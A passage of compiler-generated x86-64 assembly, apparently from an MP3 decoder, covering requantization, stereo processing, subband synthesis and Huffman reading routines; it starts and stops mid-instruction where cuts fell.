-28[rbp] mov edx, DWORD PTR -20[rbp] mov esi, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] mov r8d, edi mov edi, eax call Requantize_Process_Short add DWORD PTR -20[rbp], 1 add DWORD PTR -16[rbp], 1 .L333: mov eax, DWORD PTR -16[rbp] cmp eax, DWORD PTR -8[rbp] jb .L334 add DWORD PTR -12[rbp], 1 .L332: cmp DWORD PTR -12[rbp], 2 jbe .L335 .L330: mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 80 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp DWORD PTR -20[rbp], eax jb .L336 jmp .L337 .L317: mov DWORD PTR -28[rbp], 0 mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -24[rbp], eax mov DWORD PTR -20[rbp], 0 jmp .L338 .L340: mov eax, DWORD PTR -20[rbp] cmp eax, DWORD PTR -24[rbp] jne .L339 add DWORD PTR -28[rbp], 1 mov eax, DWORD PTR -28[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -24[rbp], eax .L339: mov ecx, DWORD PTR -28[rbp] mov edx, DWORD PTR -20[rbp] mov esi, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] mov edi, eax call Requantize_Process_Long add DWORD PTR -20[rbp], 1 .L338: mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 80 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp DWORD PTR -20[rbp], eax jb .L340 .L337: nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE34: .size L3_Requantize, .-L3_Requantize .type L3_Stereo, @function L3_Stereo: .LFB35: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov DWORD PTR -36[rbp], edi mov eax, DWORD PTR g_frame_header[rip+28] cmp eax, 1 jne .L364 mov eax, DWORD PTR g_frame_header[rip+32] test eax, eax je .L364 mov eax, DWORD PTR g_frame_header[rip+32] and eax, 2 test eax, eax je .L346 mov eax, DWORD PTR -36[rbp] add rax, 40 lea rdx, 0[0+rax*8] lea rax, g_side_info[rip+8] mov edx, DWORD PTR [rdx+rax] mov eax, DWORD PTR -36[rbp] lea rcx, 0[0+rax*8] lea rax, g_side_info[rip+332] mov eax, DWORD PTR [rcx+rax] cmp edx, eax seta al movzx eax, al movsx rdx, eax mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 80 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -16[rbp], eax mov DWORD PTR -24[rbp], 0 jmp .L347 .L348: mov ecx, DWORD PTR -24[rbp] mov edx, DWORD PTR -36[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm1, DWORD PTR [rdx+rax] mov ecx, DWORD PTR -24[rbp] mov edx, DWORD PTR -36[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 804 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] addss xmm0, xmm1 pxor xmm1, xmm1 cvtss2sd xmm1, xmm0 movsd xmm0, QWORD PTR .LC25[rip] mulsd xmm0, xmm1 cvtsd2ss xmm0, xmm0 movss DWORD PTR -12[rbp], xmm0 mov ecx, DWORD PTR -24[rbp] mov edx, DWORD PTR -36[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] mov ecx, DWORD PTR -24[rbp] mov edx, DWORD PTR -36[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 804 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm1, DWORD PTR [rdx+rax] subss xmm0, xmm1 pxor xmm1, xmm1 cvtss2sd xmm1, xmm0 movsd xmm0, QWORD PTR .LC25[rip] mulsd xmm0, xmm1 cvtsd2ss xmm0, xmm0 movss DWORD PTR -8[rbp], xmm0 mov ecx, DWORD PTR -24[rbp] mov edx, DWORD PTR -36[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR -12[rbp] movss DWORD PTR [rdx+rax], xmm0 mov ecx, DWORD PTR -24[rbp] mov edx, DWORD PTR -36[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 804 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR -8[rbp] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -24[rbp], 1 .L347: mov eax, DWORD PTR -24[rbp] cmp eax, DWORD PTR -16[rbp] jb .L348 .L346: mov eax, DWORD PTR g_frame_header[rip+32] and eax, 1 test eax, eax je .L342 mov eax, DWORD PTR g_frame_header[rip+16] mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -36[rbp] add rax, 12 lea rdx, 0[0+rax*8] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L349 mov eax, DWORD PTR -36[rbp] add rax, 14 lea rdx, 0[0+rax*8] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 2 jne .L349 mov eax, DWORD PTR -36[rbp] add rax, 16 lea rdx, 0[0+rax*8] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L350 mov DWORD PTR -20[rbp], 0 jmp .L351 .L353: mov ecx, DWORD PTR -20[rbp] mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip] mov edx, DWORD PTR [rdx+rax] mov eax, DWORD PTR -36[rbp] lea rcx, 0[0+rax*8] lea rax, g_side_info[rip+332] mov eax, DWORD PTR [rcx+rax] cmp edx, eax jb .L352 mov edx, DWORD PTR -20[rbp] mov eax, DWORD PTR -36[rbp] mov esi, edx mov edi, eax call Stereo_Process_Intensity_Long .L352: add DWORD PTR -20[rbp], 1 .L351: cmp DWORD PTR -20[rbp], 7 jbe .L353 mov DWORD PTR -20[rbp], 3 jmp .L354 .L356: mov ecx, DWORD PTR -20[rbp] mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, edx add eax, eax lea ecx, [rax+rdx] mov eax, DWORD PTR -36[rbp] lea rdx, 0[0+rax*8] lea rax, g_side_info[rip+332] mov eax, DWORD PTR [rdx+rax] cmp ecx, eax jb .L355 mov edx, DWORD PTR -20[rbp] mov eax, DWORD PTR -36[rbp] mov esi, edx mov edi, eax call Stereo_Process_Intensity_Short .L355: add DWORD PTR -20[rbp], 1 .L354: cmp DWORD PTR -20[rbp], 11 jbe .L356 jmp .L342 .L350: mov DWORD PTR -20[rbp], 0 jmp .L358 .L360: mov ecx, DWORD PTR -20[rbp] mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, edx add eax, eax lea ecx, [rax+rdx] mov eax, DWORD PTR -36[rbp] lea rdx, 0[0+rax*8] lea rax, g_side_info[rip+332] mov eax, DWORD PTR [rdx+rax] cmp ecx, eax jb .L359 mov edx, DWORD PTR -20[rbp] mov eax, DWORD PTR -36[rbp] mov esi, edx mov edi, eax call Stereo_Process_Intensity_Short .L359: add DWORD PTR -20[rbp], 1 .L358: cmp DWORD PTR -20[rbp], 11 jbe .L360 jmp .L342 .L349: mov DWORD PTR -20[rbp], 0 jmp .L361 .L363: mov ecx, DWORD PTR -20[rbp] mov edx, DWORD PTR -4[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip] mov edx, DWORD PTR [rdx+rax] mov eax, DWORD PTR -36[rbp] lea rcx, 0[0+rax*8] lea rax, g_side_info[rip+332] mov eax, DWORD PTR [rcx+rax] cmp edx, eax jb .L362 mov edx, DWORD PTR -20[rbp] mov eax, DWORD PTR -36[rbp] mov esi, edx mov edi, eax call Stereo_Process_Intensity_Long .L362: add DWORD PTR -20[rbp], 1 .L361: cmp DWORD PTR -20[rbp], 20 jbe .L363 jmp .L342 .L364: nop .L342: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE35: .size L3_Stereo, .-L3_Stereo .type L3_Subband_Synthesis, @function L3_Subband_Synthesis: .LFB36: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 2240 mov DWORD PTR -2228[rbp], edi mov DWORD PTR -2232[rbp], esi mov QWORD PTR -2240[rbp], rdx mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov eax, DWORD PTR g_frame_header[rip+28] cmp eax, 3 jne .L366 mov eax, 1 jmp .L367 .L366: mov eax, 2 .L367: mov DWORD PTR -2196[rbp], eax mov eax, DWORD PTR init.8[rip] test eax, eax je .L368 mov DWORD PTR -2208[rbp], 0 jmp .L369 .L376: mov DWORD PTR -2204[rbp], 0 jmp .L370 .L375: mov eax, DWORD PTR -2208[rbp] add eax, 16 mov eax, eax test rax, rax js .L371 pxor xmm1, xmm1 cvtsi2ss xmm1, rax jmp .L372 .L371: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2ss xmm0, rdx movaps xmm1, xmm0 addss xmm1, xmm0 .L372: mov eax, DWORD PTR -2204[rbp] add eax, eax add eax, 1 mov eax, eax test rax, rax js .L373 pxor xmm0, xmm0 cvtsi2ss xmm0, rax jmp .L374 .L373: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2ss xmm0, rdx addss xmm0, xmm0 .L374: mulss xmm0, xmm1 pxor xmm1, xmm1 cvtss2sd xmm1, xmm0 movsd xmm0, QWORD PTR .LC26[rip] mulsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax call cos@PLT cvtsd2ss xmm0, xmm0 mov edx, DWORD PTR -2204[rbp] mov eax, DWORD PTR -2208[rbp] sal rax, 5 add rax, rdx lea rdx, 0[0+rax*4] lea rax, g_synth_n_win.7[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -2204[rbp], 1 .L370: cmp DWORD PTR -2204[rbp], 31 jbe .L375 add DWORD PTR -2208[rbp], 1 .L369: cmp DWORD PTR -2208[rbp], 63 jbe .L376 mov DWORD PTR -2208[rbp], 0 jmp .L377 .L380: mov DWORD PTR -2204[rbp], 0 jmp .L378 .L379: mov edx, DWORD PTR -2204[rbp] mov eax, DWORD PTR -2208[rbp] sal rax, 10 add rax, rdx lea rdx, 0[0+rax*4] lea rax, v_vec.6[rip] pxor xmm0, xmm0 movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -2204[rbp], 1 .L378: cmp DWORD PTR -2204[rbp], 1023 jbe .L379 add DWORD PTR -2208[rbp], 1 .L377: cmp DWORD PTR -2208[rbp], 1 jbe .L380 mov DWORD PTR init.8[rip], 0 .L368: mov eax, DWORD PTR synth_init[rip] test eax, eax je .L381 mov DWORD PTR -2208[rbp], 0 jmp .L382 .L385: mov DWORD PTR -2204[rbp], 0 jmp .L383 .L384: mov edx, DWORD PTR -2204[rbp] mov eax, DWORD PTR -2208[rbp] sal rax, 10 add rax, rdx lea rdx, 0[0+rax*4] lea rax, v_vec.6[rip] pxor xmm0, xmm0 movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -2204[rbp], 1 .L383: cmp DWORD PTR -2204[rbp], 1023 jbe .L384 add DWORD PTR -2208[rbp], 1 .L382: cmp DWORD PTR -2208[rbp], 1 jbe .L385 mov DWORD PTR synth_init[rip], 0 .L381: mov DWORD PTR -2200[rbp], 0 jmp .L386 .L410: mov DWORD PTR -2208[rbp], 1023 jmp .L387 .L388: mov eax, DWORD PTR -2208[rbp] sub eax, 64 mov edx, eax mov eax, DWORD PTR -2232[rbp] sal rax, 10 add rax, rdx lea rdx, 0[0+rax*4] lea rax, v_vec.6[rip] movss xmm0, DWORD PTR [rdx+rax] mov edx, DWORD PTR -2208[rbp] mov eax, DWORD PTR -2232[rbp] sal rax, 10 add rax, rdx lea rdx, 0[0+rax*4] lea rax, v_vec.6[rip] movss DWORD PTR [rdx+rax], xmm0 sub DWORD PTR -2208[rbp], 1 .L387: cmp DWORD PTR -2208[rbp], 63 ja .L388 mov DWORD PTR -2208[rbp], 0 jmp .L389 .L390: mov edx, DWORD PTR -2208[rbp] mov eax, edx sal eax, 3 add eax, edx add eax, eax mov edx, eax mov eax, DWORD PTR -2200[rbp] add eax, edx mov esi, eax mov eax, DWORD PTR -2228[rbp] mov ecx, DWORD PTR -2232[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] mov eax, DWORD PTR -2208[rbp] movss DWORD PTR -2192[rbp+rax*4], xmm0 add DWORD PTR -2208[rbp], 1 .L389: cmp DWORD PTR -2208[rbp], 31 jbe .L390 mov DWORD PTR -2208[rbp], 0 jmp .L391 .L394: pxor xmm0, xmm0 movss DWORD PTR -2216[rbp], xmm0 mov DWORD PTR -2204[rbp], 0 jmp .L392 .L393: mov edx, DWORD PTR -2204[rbp] mov eax, DWORD PTR -2208[rbp] sal rax, 5 add rax, rdx lea rdx, 0[0+rax*4] lea rax, g_synth_n_win.7[rip] movss xmm1, DWORD PTR [rdx+rax] mov eax, DWORD PTR -2204[rbp] movss xmm0, DWORD PTR -2192[rbp+rax*4] mulss xmm0, xmm1 movss xmm1, DWORD PTR -2216[rbp] addss xmm0, xmm1 movss DWORD PTR -2216[rbp], xmm0 add DWORD PTR -2204[rbp], 1 .L392: cmp DWORD PTR -2204[rbp], 31 jbe .L393 mov edx, DWORD PTR -2208[rbp] mov eax, DWORD PTR -2232[rbp] sal rax, 10 add rax, rdx lea rdx, 0[0+rax*4] lea rax, v_vec.6[rip] movss xmm0, DWORD PTR -2216[rbp] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -2208[rbp], 1 .L391: cmp DWORD PTR -2208[rbp], 63 jbe .L394 mov DWORD PTR -2208[rbp], 0 jmp .L395 .L398: mov DWORD PTR -2204[rbp], 0 jmp .L396 .L397: mov eax, DWORD PTR -2208[rbp] sal eax, 7 mov edx, eax mov eax, DWORD PTR -2204[rbp] add edx, eax mov eax, DWORD PTR -2208[rbp] sal eax, 6 mov ecx, eax mov eax, DWORD PTR -2204[rbp] add ecx, eax mov edx, edx mov eax, DWORD PTR -2232[rbp] sal rax, 10 add rax, rdx lea rdx, 0[0+rax*4] lea rax, v_vec.6[rip] movss xmm0, DWORD PTR [rdx+rax] mov eax, ecx movss DWORD PTR -2064[rbp+rax*4], xmm0 mov eax, DWORD PTR -2208[rbp] sal eax, 7 mov edx, eax mov eax, DWORD PTR -2204[rbp] add eax, edx lea edx, 96[rax] mov eax, DWORD PTR -2208[rbp] sal eax, 6 mov ecx, eax mov eax, DWORD PTR -2204[rbp] add eax, ecx lea ecx, 32[rax] mov edx, edx mov eax, DWORD PTR -2232[rbp] sal rax, 10 add rax, rdx lea rdx, 0[0+rax*4] lea rax, v_vec.6[rip] movss xmm0, DWORD PTR [rdx+rax] mov eax, ecx movss DWORD PTR -2064[rbp+rax*4], xmm0 add DWORD PTR -2204[rbp], 1 .L396: cmp DWORD PTR -2204[rbp], 31 jbe .L397 add DWORD PTR -2208[rbp], 1 .L395: cmp DWORD PTR -2208[rbp], 7 jbe .L398 mov DWORD PTR -2208[rbp], 0 jmp .L399 .L400: mov eax, DWORD PTR -2208[rbp] movss xmm1, DWORD PTR -2064[rbp+rax*4] mov eax, DWORD PTR -2208[rbp] lea rdx, 0[0+rax*4] lea rax, g_synth_dtbl[rip] movss xmm0, DWORD PTR [rdx+rax] mulss xmm0, xmm1 mov eax, DWORD PTR -2208[rbp] movss DWORD PTR -2064[rbp+rax*4], xmm0 add DWORD PTR -2208[rbp], 1 .L399: cmp DWORD PTR -2208[rbp], 511 jbe .L400 mov DWORD PTR -2208[rbp], 0 jmp .L401 .L409: pxor xmm0, xmm0 movss DWORD PTR -2216[rbp], xmm0 mov DWORD PTR -2204[rbp], 0 jmp .L402 .L403: mov eax, DWORD PTR -2204[rbp] sal eax, 5 mov edx, eax mov eax, DWORD PTR -2208[rbp] add eax, edx mov eax, eax movss xmm0, DWORD PTR -2064[rbp+rax*4] movss xmm1, DWORD PTR -2216[rbp] addss xmm0, xmm1 movss DWORD PTR -2216[rbp], xmm0 add DWORD PTR -2204[rbp], 1 .L402: cmp DWORD PTR -2204[rbp], 15 jbe .L403 pxor xmm1, xmm1 cvtss2sd xmm1, DWORD PTR -2216[rbp] movsd xmm0, QWORD PTR .LC27[rip] mulsd xmm0, xmm1 cvttsd2si eax, xmm0 mov DWORD PTR -2212[rbp], eax cmp DWORD PTR -2212[rbp], 32767 jle .L404 mov DWORD PTR -2212[rbp], 32767 jmp .L405 .L404: cmp DWORD PTR -2212[rbp], -32767 jge .L405 mov DWORD PTR -2212[rbp], -32767 .L405: and DWORD PTR -2212[rbp], 65535 cmp DWORD PTR -2232[rbp], 0 jne .L406 cmp DWORD PTR -2196[rbp], 1 jne .L407 mov eax, DWORD PTR -2212[rbp] sal eax, 16 or eax, DWORD PTR -2212[rbp] mov edx, eax mov eax, DWORD PTR -2200[rbp] sal eax, 5 mov ecx, eax mov eax, DWORD PTR -2208[rbp] add eax, ecx mov eax, eax lea rcx, 0[0+rax*4] mov rax, QWORD PTR -2240[rbp] add rax, rcx mov DWORD PTR [rax], edx jmp .L408 .L407: mov eax, DWORD PTR -2212[rbp] sal eax, 16 mov edx, eax mov eax, DWORD PTR -2200[rbp] sal eax, 5 mov ecx, eax mov eax, DWORD PTR -2208[rbp] add eax, ecx mov eax, eax lea rcx, 0[0+rax*4] mov rax, QWORD PTR -2240[rbp] add rax, rcx mov DWORD PTR [rax], edx jmp .L408 .L406: mov eax, DWORD PTR -2200[rbp] sal eax, 5 mov edx, eax mov eax, DWORD PTR -2208[rbp] add eax, edx mov eax, eax lea rdx, 0[0+rax*4] mov rax, QWORD PTR -2240[rbp] add rax, rdx mov ecx, DWORD PTR [rax] mov edx, DWORD PTR -2212[rbp] mov eax, DWORD PTR -2200[rbp] sal eax, 5 mov esi, eax mov eax, DWORD PTR -2208[rbp] add eax, esi mov eax, eax lea rsi, 0[0+rax*4] mov rax, QWORD PTR -2240[rbp] add rax, rsi or edx, ecx mov DWORD PTR [rax], edx .L408: add DWORD PTR -2208[rbp], 1 .L401: cmp DWORD PTR -2208[rbp], 31 jbe .L409 add DWORD PTR -2200[rbp], 1 .L386: cmp DWORD PTR -2200[rbp], 17 jbe .L410 nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L412 call __stack_chk_fail@PLT .L412: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE36: .size L3_Subband_Synthesis, .-L3_Subband_Synthesis .type Read_Huffman, @function Read_Huffman: .LFB37: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 64 mov DWORD PTR -52[rbp], edi mov DWORD PTR -56[rbp], esi mov DWORD PTR -60[rbp], edx mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov edx, DWORD PTR -60[rbp] mov eax, DWORD PTR -56[rbp] add rax, rax add rax, rdx add rax, 8 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] test eax, eax jne .L414 mov DWORD PTR -28[rbp], 0 jmp .L415 .L416: mov esi, DWORD PTR -28[rbp] mov eax, DWORD PTR -56[rbp] mov ecx, DWORD PTR -60[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] pxor xmm0, xmm0 movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -28[rbp], 1 .L415: cmp DWORD PTR -28[rbp], 575 jbe .L416 jmp .L413 .L414: mov edx, DWORD PTR -60[rbp] mov eax, DWORD PTR -56[rbp] add rax, rax add rax, rdx add rax, 8 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov edx, DWORD PTR [rdx+rax] mov eax, DWORD PTR -52[rbp] add eax, edx sub eax, 1 mov DWORD PTR -16[rbp], eax mov edx, DWORD PTR -60[rbp] mov eax, DWORD PTR -56[rbp] add rax, rax add rax, rdx add rax, 24 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L418 mov edx, DWORD PTR -60[rbp] mov eax, DWORD PTR -56[rbp] add rax, rax add rax, rdx add rax, 28 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 2 jne .L418 mov DWORD PTR -24[rbp], 36 mov DWORD PTR -20[rbp], 576 jmp .L419 .L418: mov eax, DWORD PTR g_frame_header[rip+16] mov DWORD PTR -12[rbp], eax mov edx, DWORD PTR -60[rbp] mov eax, DWORD PTR -56[rbp] add rax, rax add rax, rdx add rax, 60 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] add eax, 1 mov ecx, eax mov edx, DWORD PTR -12[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -24[rbp], eax mov edx, DWORD PTR -60[rbp] mov eax, DWORD PTR -56[rbp] add rax, rax add rax, rdx add rax, 60 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov ecx, DWORD PTR [rdx+rax] mov edx, DWORD PTR -60[rbp] mov eax, DWORD PTR -56[rbp] add rax, rax add rax, rdx add rax, 64 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] add eax, ecx add eax, 2 mov ecx, eax mov edx, DWORD PTR -12[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -20[rbp], eax .L419: mov DWORD PTR -28[rbp], 0 jmp .L420 .L424: mov eax, DWORD PTR -28[rbp] cmp eax, DWORD PTR -24[rbp] jnb .L421 mov eax, DWORD PTR -60[rbp] mov ecx, DWORD PTR -56[rbp] mov rdx, rax add rdx, rdx add rdx, rax lea rax, 0[0+rdx*4] mov rdx, rax mov rax, rcx add rax, rax add rax, rcx sal rax, 3 add rdx, rax lea rax, g_side_info[rip+152] add rax, rdx mov eax, DWORD PTR [rax] mov DWORD PTR -32[rbp], eax jmp .L422 .L421: mov eax, DWORD PTR -28[rbp] cmp eax, DWORD PTR -20[rbp] jnb .L423 mov eax, DWORD PTR -60[rbp] mov ecx, DWORD PTR -56[rbp] mov rdx, rax add rdx, rdx add rdx, rax lea rax, 0[0+rdx*4] mov rdx, rax mov rax, rcx add rax, rax add rax, rcx sal rax, 3 add rdx, rax lea rax, g_side_info[rip+156] add rax, rdx mov eax, DWORD PTR [rax] mov DWORD PTR -32[rbp], eax jmp .L422 .L423: mov eax, DWORD PTR -60[rbp] mov ecx, DWORD PTR -56[rbp] mov rdx, rax add rdx, rdx add rdx, rax lea rax, 0[0+rdx*4] mov rdx, rax mov rax, rcx add rax, rax add rax, rcx sal rax, 3 add rdx, rax lea rax, g_side_info[rip+160] add rax, rdx mov eax, DWORD PTR [rax] mov DWORD PTR -32[rbp], eax .L422: lea rdi, -36[rbp] lea rcx, -40[rbp] lea rdx, -44[rbp] lea rsi, -48[rbp] mov eax, DWORD PTR -32[rbp] mov r8, rdi mov edi, eax call Huffman_Decode mov ecx, DWORD PTR -48[rbp] mov eax, DWORD PTR -28[rbp] lea edx, 1[rax] mov DWORD PTR -28[rbp], edx pxor xmm0, xmm0 cvtsi2ss xmm0, ecx mov esi, eax mov eax, DWORD PTR -56[rbp] mov ecx, DWORD PTR -60[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 mov eax, DWORD PTR -44[rbp] pxor xmm0, xmm0 cvtsi2ss xmm0, eax mov esi, DWORD PTR -28[rbp] mov eax, DWORD PTR -56[rbp] mov ecx, DWORD PTR -60[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -28[rbp], 1 .L420: mov edx, DWORD PTR -60[rbp] mov eax, DWORD PTR -56[rbp] add rax, rax add rax, rdx add rax, 12 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] add eax, eax cmp DWORD PTR -28[rbp], eax jb .L424 mov edx, DWORD PTR -60[rbp] mov eax, DWORD PTR -56[rbp] add rax, rax add rax, rdx add rax, 76 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] add eax, 32 mov DWORD PTR -32[rbp], eax mov edx, DWORD PTR -60[rbp] mov eax, DWORD PTR -56[rbp] add rax, rax add rax, rdx add rax, 12 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] add eax, eax mov DWORD PTR -28[rbp], eax jmp .L425 .L430: lea rdi, -36[rbp] lea rcx, -40[rbp] lea rdx, -44[rbp] lea rsi, -48[rbp] mov eax, DWORD PTR -32[rbp] mov r8, rdi mov edi, eax call Huffman_Decode mov ecx, DWORD PTR -40[rbp] mov eax, DWORD PTR -28[rbp] lea edx, 1[rax] mov DWORD PTR -28[rbp], edx pxor xmm0, xmm0 cvtsi2ss xmm0, ecx mov esi, eax mov eax, DWORD PTR -56[rbp] mov ecx, DWORD PTR -60[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 cmp DWORD PTR -28[rbp], 575 ja .L436 mov ecx, DWORD PTR -36[rbp] mov eax, DWORD PTR -28[rbp] lea edx, 1[rax] mov DWORD PTR -28[rbp], edx pxor xmm0, xmm0 cvtsi2ss xmm0, ecx mov esi, eax mov eax, DWORD PTR -56[rbp] mov ecx, DWORD PTR -60[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 cmp DWORD PTR -28[rbp], 575 ja .L437 mov ecx, DWORD PTR -48[rbp] mov eax, DWORD PTR -28[rbp] lea edx, 1[rax] mov DWORD PTR -28[rbp], edx pxor xmm0, xmm0 cvtsi2ss xmm0, ecx mov esi, eax mov eax, DWORD PTR -56[rbp] mov ecx, DWORD PTR -60[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 cmp DWORD PTR -28[rbp], 575 ja .L438 mov eax, DWORD PTR -44[rbp] pxor xmm0, xmm0 cvtsi2ss 